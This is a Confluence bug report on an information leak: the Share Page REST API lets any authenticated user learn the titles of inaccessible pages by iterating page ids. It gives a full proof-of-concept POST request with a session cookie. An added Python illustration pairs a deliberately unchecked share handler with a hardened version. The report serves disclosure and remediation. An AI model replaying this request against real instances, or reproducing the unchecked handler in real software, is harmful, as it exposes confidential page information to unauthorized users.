Confluence Data Center: CONFSERVER-31013

Inaccessible page titles leaked by Share Page API


Details

    Description

      The Share Page API exposes a REST endpoint that is available to authenticated users of Confluence. It is possible for any user to share any page simply by specifying the corresponding numeric id and the resulting notification includes the title of the shared page. In particular, a user may obtain the title of any page in a Confluence instance, including those to which they have no access, simply by iterating over all possible identifiers. Although the content of pages is not available in the notification, this still represents a moderately serious information leak.

      The following POST request was made whilst authenticated to a Confluence instance as user “phill”:

      POST /rest/share-page/latest/share HTTP/1.1
      Host: confluenceserver:8090
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
      Accept: text/plain, */*; q=0.01
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/json; charset=utf-8
      X-Requested-With: XMLHttpRequest
      Referer: http://192.168.79.130:8090/display/ds/2013/09/18/another+blog+post
      Content-Length: 82
      Cookie: confluence-sidebar.width=285; AJS.conglomerate.cookie="|streams.view.2147942400=full-view"; confluence.browse.space.cookie=space-blogposts; JSESSIONID=EF049B1CFBDE8A8B36252AC9D18ED8FC; mywork.tab.tasks=false
      Connection: keep-alive
      Pragma: no-cache
      Cache-Control: no-cache

      {"users":["phill"],"emails":[],"groups":[],"note":"","entityId":"524789"}

      The entityId value represents a page in a space that is inaccessible to the user “phill”. The resulting notification to the user "phill" includes the title of the inaccessible page.
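      A minimal Python model of the reported behaviour next to a hardened version, added here as an illustration and not code from Confluence: the page store, permission table, titles and user names are constructed, and the hardened handler additionally filters recipients without view permission, which goes beyond what the report itself asks for.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Page:
    entity_id: int
    title: str
    space_key: str


# Constructed sample content: a finance space "phill" cannot see, and the "ds"
# space from the report's Referer, which he can.
PAGES = {
    524789: Page(524789, "Q3 acquisition plan", "FIN"),
    524790: Page(524790, "Another blog post", "ds"),
}
# Constructed permission model: users allowed to view each space.
SPACE_VIEWERS = {"FIN": {"cfo"}, "ds": {"phill", "cfo"}}
GENERIC_ERROR = "Page not found or not permitted"


class ShareError(Exception):
    pass


def can_view(user: str, page: Page) -> bool:
    return user in SPACE_VIEWERS.get(page.space_key, set())


def share_vulnerable(sharer: str, entity_id: int, recipients: list[str]) -> dict:
    """Mirrors the reported behaviour: the page is looked up by id and its
    title copied into the notification without any view-permission check."""
    page = PAGES.get(entity_id)
    if page is None:
        raise ShareError("not found")
    return {"from": sharer, "to": list(recipients), "title": page.title}


def share_hardened(sharer: str, entity_id: int, recipients: list[str]) -> dict:
    """Authorise the sharer before touching the title, and answer missing and
    inaccessible ids identically so the endpoint is not an existence oracle."""
    page = PAGES.get(entity_id)
    if page is None or not can_view(sharer, page):
        raise ShareError(GENERIC_ERROR)
    # Recipients without view permission would learn the title too; drop them.
    allowed = [r for r in recipients if can_view(r, page)]
    return {"from": sharer, "to": allowed, "title": page.title}


def share_result(handler, sharer: str, entity_id: int, recipients: list[str]) -> dict:
    """Run a handler and return either its notification or the error text."""
    try:
        return handler(sharer, entity_id, recipients)
    except ShareError as exc:
        return {"error": str(exc)}
```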

      People

        Vu Truong Vo (Inactive)
        Phillip Langlois